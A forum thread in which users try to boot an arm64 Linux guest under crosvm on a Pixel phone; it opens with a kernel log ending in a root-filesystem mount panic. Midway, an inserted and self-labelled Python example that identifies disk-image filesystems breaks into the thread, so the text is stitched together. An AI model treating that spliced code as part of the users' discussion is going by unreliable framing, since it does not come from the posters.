[ 0.336176] pci_bus 0000:00: root bus resource [mem 0x90800000-0xffffffffff]
[ 0.336263] pci 0000:00:00.0: [8086:1237] type 00 class 0x060000
[ 0.336641] pci 0000:00:01.0: [1af4:1042] type 00 class 0x00ff00
[ 0.336710] pci 0000:00:01.0: reg 0x10: [mem 0x02000000-0x02007fff]
[ 0.337115] pci 0000:00:02.0: [1af4:1044] type 00 class 0x00ff00
[ 0.337160] pci 0000:00:02.0: reg 0x10: [mem 0x02008000-0x0200ffff]
[ 0.337532] pci 0000:00:03.0: [1af4:1045] type 00 class 0x00ff00
[ 0.337590] pci 0000:00:03.0: reg 0x10: [mem 0x02010000-0x02017fff]
[ 0.338005] pci 0000:00:04.0: [1b73:1000] type 00 class 0x0c0330
[ 0.338051] pci 0000:00:04.0: reg 0x10: [mem 0x02020000-0x0202ffff]
[ 0.338280] pci 0000:00:05.0: [1b36:0011] type 00 class 0xffff00
[ 0.338324] pci 0000:00:05.0: reg 0x10: [mem 0x02018000-0x0201800f]
[ 0.338601] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
[ 0.338810] IPMI message handler: version 39.2
[ 0.340673] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
[ 0.341038] printk: console [ttyS0] disabled
[ 0.341056] 3f8.U6_16550A: ttyS0 at MMIO 0x3f8 (irq = 13, base_baud = 115200) is a 16550A
[ 0.435958] printk: console [ttyS0] enabled
[ 0.436464] 2f8.U6_16550A: ttyS1 at MMIO 0x2f8 (irq = 14, base_baud = 115200) is a 16550A
[ 0.437278] 3e8.U6_16550A: ttyS2 at MMIO 0x3e8 (irq = 13, base_baud = 115200) is a 16550A
[ 0.438016] 2e8.U6_16550A: ttyS3 at MMIO 0x2e8 (irq = 14, base_baud = 115200) is a 16550A
[ 0.438946] msm_serial: driver initialized
[ 0.439964] cacheinfo: Unable to detect cache hierarchy for CPU 0
[ 0.441149] virtio_blk virtio0: [vda] 5104 512-byte logical blocks (2.61 MB/2.49 MiB)
[ 0.453696] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
[ 0.454270] ehci-pci: EHCI PCI platform driver
[ 0.454594] ehci-platform: EHCI generic platform driver
[ 0.454966] ehci-orion: EHCI orion driver
[ 0.455348] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver
[ 0.455993] ohci-pci: OHCI PCI platform driver
[ 0.456383] ohci-platform: OHCI generic platform driver
[ 0.456811] uhci_hcd: USB Universal Host Controller Interface driver
[ 0.457630] xhci_hcd 0000:00:04.0: xHCI Host Controller
[ 0.458104] xhci_hcd 0000:00:04.0: new USB bus registered, assigned bus number 1
[ 0.459156] xhci_hcd 0000:00:04.0: hcc params 0x30000501 hci version 0x110 quirks 0x0000000000080452
[ 0.460161] usb usb1: New USB device found, idVendor=1d6b, idProduct=0002, bcdDevice= 5.16
[ 0.460851] usb usb1: New USB device strings: Mfr=3, Product=2, SerialNumber=1
[ 0.461608] usb usb1: Product: xHCI Host Controller
[ 0.462011] usb usb1: Manufacturer: Linux 5.16.13-1-aarch64-ARCH xhci-hcd
[ 0.462646] usb usb1: SerialNumber: 0000:00:04.0
[ 0.463143] hub 1-0:1.0: USB hub found
[ 0.463495] hub 1-0:1.0: 8 ports detected
[ 0.464194] xhci_hcd 0000:00:04.0: xHCI Host Controller
[ 0.464627] xhci_hcd 0000:00:04.0: new USB bus registered, assigned bus number 2
[ 0.465279] xhci_hcd 0000:00:04.0: Host supports USB 3.0 SuperSpeed
[ 0.465775] usb usb2: We don't know the algorithms for LPM for this host, disabling LPM.
[ 0.466639] usb usb2: New USB device found, idVendor=1d6b, idProduct=0003, bcdDevice= 5.16
[ 0.467436] usb usb2: New USB device strings: Mfr=3, Product=2, SerialNumber=1
[ 0.468076] usb usb2: Product: xHCI Host Controller
[ 0.468511] usb usb2: Manufacturer: Linux 5.16.13-1-aarch64-ARCH xhci-hcd
[ 0.469285] usb usb2: SerialNumber: 0000:00:04.0
[ 0.469718] hub 2-0:1.0: USB hub found
[ 0.470134] hub 2-0:1.0: 8 ports detected
[ 0.470916] SPI driver max3421-hcd has no spi_device_id for maxim,max3421
[ 0.471647] usbcore: registered new interface driver uas
[ 0.472196] usbcore: registered new interface driver usb-storage
[ 0.472728] usbcore: registered new interface driver ums-alauda
[ 0.473262] usbcore: registered new interface driver ums-cypress
[ 0.473811] usbcore: registered new interface driver ums-datafab
[ 0.474339] usbcore: registered new interface driver ums_eneub6250
[ 0.474857] usbcore: registered new interface driver ums-freecom
[ 0.475381] usbcore: registered new interface driver ums-isd200
[ 0.475872] usbcore: registered new interface driver ums-jumpshot
[ 0.476471] usbcore: registered new interface driver ums-karma
[ 0.476980] usbcore: registered new interface driver ums-onetouch
[ 0.477628] usbcore: registered new interface driver ums-realtek
[ 0.478187] usbcore: registered new interface driver ums-sddr09
[ 0.478692] usbcore: registered new interface driver ums-sddr55
[ 0.479190] usbcore: registered new interface driver ums-usbat
[ 0.479673] usbcore: registered new interface driver usbserial_generic
[ 0.480210] usbserial: USB Serial support registered for generic
[ 0.480937] mousedev: PS/2 mouse device common for all mice
[ 0.482039] device-mapper: uevent: version 1.0.3
[ 0.482585] device-mapper: ioctl: 4.45.0-ioctl (2021-03-22) initialised: [email protected]
[ 0.483635] sdhci: Secure Digital Host Controller Interface driver
[ 0.484165] sdhci: Copyright(c) Pierre Ossman
[ 0.484597] Synopsys Designware Multimedia Card Interface Driver
[ 0.485538] sdhci-pltfm: SDHCI platform and OF driver helper
[ 0.486181] ledtrig-cpu: registered to indicate activity on CPUs
[ 0.486938] hid: raw HID events driver (C) Jiri Kosina
[ 0.487505] usbcore: registered new interface driver usbhid
[ 0.488046] usbhid: USB HID core driver
[ 0.489286] Initializing XFRM netlink socket
[ 0.489884] NET: Registered PF_INET6 protocol family
[ 0.492003] Segment Routing with IPv6
[ 0.492396] In-situ OAM (IOAM) with IPv6
[ 0.492901] mip6: Mobile IPv6
[ 0.493198] NET: Registered PF_PACKET protocol family
[ 0.493793] Key type dns_resolver registered
[ 0.494390] registered taskstats version 1
[ 0.494742] Loading compiled-in X.509 certificates
[ 0.495343] zswap: loaded using pool lzo/zbud
[ 0.495785] debug_vm_pgtable: [debug_vm_pgtable ]: Validating architecture page table helpers
[ 0.496723] Key type ._fscrypt registered
[ 0.497098] Key type .fscrypt registered
[ 0.497514] Key type fscrypt-provisioning registered
[ 0.498375] Btrfs loaded, crc32c=crc32c-generic, zoned=yes, fsverity=no
[ 0.499191] Key type encrypted registered
[ 0.657459] ALSA device list:
[ 0.657786] No soundcards found.
[ 0.658355] md: Waiting for all devices to be available before autodetect
[ 0.658953] md: If you don't use raid, use raid=noautodetect
[ 0.659460] md: Autodetecting RAID arrays.
[ 0.659861] md: autorun ...
[ 0.660147] md: ... autorun DONE.
[ 0.664078] F2FS-fs (vda): Magic Mismatch, valid(0xf2f52010) - read(0x98375fa1)
[ 0.664970] F2FS-fs (vda): Can't find valid F2FS filesystem in 1th superblock
[ 0.666059] F2FS-fs (vda): Magic Mismatch, valid(0xf2f52010) - read(0x65e3faa7)
[ 0.666714] F2FS-fs (vda): Can't find valid F2FS filesystem in 2th superblock
[ 0.670343] F2FS-fs (vda): Magic Mismatch, valid(0xf2f52010) - read(0x98375fa1)
[ 0.671002] F2FS-fs (vda): Can't find valid F2FS filesystem in 1th superblock
[ 0.672025] F2FS-fs (vda): Magic Mismatch, valid(0xf2f52010) - read(0x65e3faa7)
[ 0.672732] F2FS-fs (vda): Can't find valid F2FS filesystem in 2th superblock
[ 0.673553] List of all partitions:
[ 0.673850] fd00 2552 vda
[ 0.673853] driver: virtio_blk
[ 0.674375] No filesystem could mount root, tried:
[ 0.674377] ext3
[ 0.674706] ext2
[ 0.674854] ext4
[ 0.674988] vfat
[ 0.675161] msdos
[ 0.675411] ntfs3
[ 0.675683] xfs
[ 0.675867] f2fs
[ 0.676014] btrfs
[ 0.676172]
[ 0.676436] Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(253,0)
[ 0.677087] CPU: 0 PID: 1 Comm: swapper/0 Not tainted 5.16.13-1-aarch64-ARCH #1
[ 0.677776] Hardware name: linux,dummy-virt (DT)
[ 0.678237] Call trace:
[ 0.678497] dump_backtrace+0x0/0x1cc
[ 0.678848] show_stack+0x18/0x24
[ 0.679114] dump_stack_lvl+0x68/0x84
[ 0.679447] dump_stack+0x18/0x34
[ 0.679729] panic+0x138/0x308
[ 0.679991] mount_block_root+0x1e0/0x1fc
[ 0.680365] mount_root+0x150/0x170
[ 0.680707] prepare_namespace+0x134/0x174
[ 0.681151] kernel_init_freeable+0x20c/0x244
[ 0.681573] kernel_init+0x28/0x140
[ 0.681889] ret_from_fork+0x10/0x20
[ 0.682201] Kernel Offset: disabled
[ 0.682483] CPU features: 0x00,00000302,46600e42
[ 0.682904] Memory Limit: none
[INFO:external/crosvm/src/linux/vcpu.rs:470] system reset event
[INFO:external/crosvm/src/linux/mod.rs:1830] vcpu requested reset
[ERROR:external/crosvm/src/linux/vcpu.rs:739] failed to send VcpuControl: sending on a closed channel
[INFO:external/crosvm/src/main.rs:2872] crosvm has exited normally due to reset request.
Can someone show me how they got it to run?
Thanks Ron
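An added example, not part of the post above and not crosvm or kernel code: the panic in that log lists the filesystems the guest kernel tried for `/dev/vda`, so this sketch identifies what a disk image actually contains from its superblock magic and checks it against that list. It goes beyond the log by also recognising squashfs and common archive formats; the log excerpt is copied from the post, while the image bytes and all function names are constructed for illustration.

```python
import re
import struct

# (label, byte offset, magic, kernel filesystem names able to mount it).
# Offset-0 magics come first; FAT is left out because it has no single magic.
SIGNATURES = [
    ("squashfs", 0, b"hsqs", ("squashfs",)),
    ("xfs", 0, b"XFSB", ("xfs",)),
    ("gzip archive", 0, b"\x1f\x8b", ()),
    ("cpio archive (newc)", 0, b"070701", ()),
    ("tar archive", 257, b"ustar", ()),
    ("f2fs", 1024, struct.pack("<I", 0xF2F52010), ("f2fs",)),
    ("ext2/3/4", 1080, struct.pack("<H", 0xEF53), ("ext2", "ext3", "ext4")),
    ("btrfs", 0x10040, b"_BHRfS_M", ("btrfs",)),
]

TIMESTAMP_RE = re.compile(r"^\[\s*\d+\.\d+\]\s?(.*)$")


def tried_filesystems(dmesg):
    """Extract the names printed after 'No filesystem could mount root, tried:'."""
    names, collecting = [], False
    for raw in dmesg.splitlines():
        m = TIMESTAMP_RE.match(raw.strip())
        text = (m.group(1) if m else raw).strip()
        if "No filesystem could mount root, tried:" in text:
            collecting = True
            names += text.split("tried:", 1)[1].split()  # same-line variant
            continue
        if collecting:
            if not text or " " in text:   # blank line or next message ends the list
                break
            names.append(text)
    return names


def identify(image):
    """Return (label, drivers) for the first matching superblock/archive magic."""
    for label, offset, magic, drivers in SIGNATURES:
        if image[offset:offset + len(magic)] == magic:
            return label, drivers
    return "unknown", ()


def diagnose(image, dmesg):
    """Explain whether the kernel that produced `dmesg` could mount `image`."""
    label, drivers = identify(image)
    usable = [d for d in drivers if d in tried_filesystems(dmesg)]
    if label == "unknown":
        verdict = "unrecognised"       # no known magic: truncated or raw data
    elif not drivers:
        verdict = "not-a-filesystem"   # an archive must be unpacked into an image
    elif not usable:
        verdict = "driver-missing"     # rebuild the kernel with this filesystem
    else:
        verdict = "mountable"
    return label, usable, verdict


# Excerpt copied from the panic in the post above.
PANIC_LOG = """\
[ 0.674375] No filesystem could mount root, tried:
[ 0.674377] ext3
[ 0.674706] ext2
[ 0.674854] ext4
[ 0.674988] vfat
[ 0.675161] msdos
[ 0.675411] ntfs3
[ 0.675683] xfs
[ 0.675867] f2fs
[ 0.676014] btrfs
[ 0.676172]
[ 0.676436] Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(253,0)
"""


def make_image(offset, magic, size=4096):
    """Constructed stand-in for a disk image: zeros with one magic planted."""
    img = bytearray(size)
    img[offset:offset + len(magic)] = magic
    return bytes(img)


SQUASHFS_IMG = make_image(0, b"hsqs")
EXT_IMG = make_image(1080, struct.pack("<H", 0xEF53))
GZIP_IMG = make_image(0, b"\x1f\x8b\x08")

if __name__ == "__main__":
    for name, img in [("squashfs", SQUASHFS_IMG), ("ext", EXT_IMG), ("gzip", GZIP_IMG)]:
        print(name, diagnose(img, PANIC_LOG))
```

To check a real image, read its first 128 KiB (enough to reach the btrfs superblock) and pass the bytes to `diagnose()` together with the guest's console log.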
Hi Ron / @cron5918. Welcome to XDA. Please in the future use either [quote]stuff[/quote] or [spoiler="Name of stuff"]stuff[/spoiler] for super-long segments of logs or code.
You can Edit your post and insert those items any time if you wouldn't mind. Disregard.
Hi headheadhead
Which cloud image did you use? I tried a couple and got no path to disk
I tried Ron's way also, no luck
rgarcia1000 said:
Hi headheadhead
Which cloud image did you use? I tried a couple and got no path to disk
The image I used is this.
Hi Head,
I read what you wrote to Rich..
You are running amd64 on the pixel?
How are you guys getting / building your kernels? Been trying to get this to work too.
cron5918 said:
Hi Head,
I read what you wrote to Rich..
You are running amd64 on the pixel?
Sorry for the mistake. I ran arm64 on pixel. It is now corrected.
blundergat said:
How are you guys getting / building your kernels? Been trying to get this to work too.
Use the Linux mainline kernel. You can find several tutorials about building the Linux mainline kernel.
blundergat said:
How are you guys getting / building your kernels? Been trying to get this to work too.
I used Linux 5.17-rc3 and compiled.
>make ARCH=aarm64 with allnoconfig. then I edit the .config file for kvm.
But I still can't get it to mount the root file system.
Been asking for this also, I don't know if I am building the Kernel right.
Head, if it is not too much trouble can you show us what you did to build the kernel?
rgarcia1000 said:
I used Linux 5.17-rc3 and compiled.
>make ARCH=aarm64 with allnoconfig. then I edit the .config file for kvm.
But I still can't get it to mount the root file system.
Thanks for the pointer! I've built kernels in the past but forgive me for such a stupid question. You're building this on your pc not your phone right? I keep getting this error on Arch.
Code:
Makefile:625: arch/aarm64/Makefile: No such file or directory
However I can build doing "make ARCH=arm64".
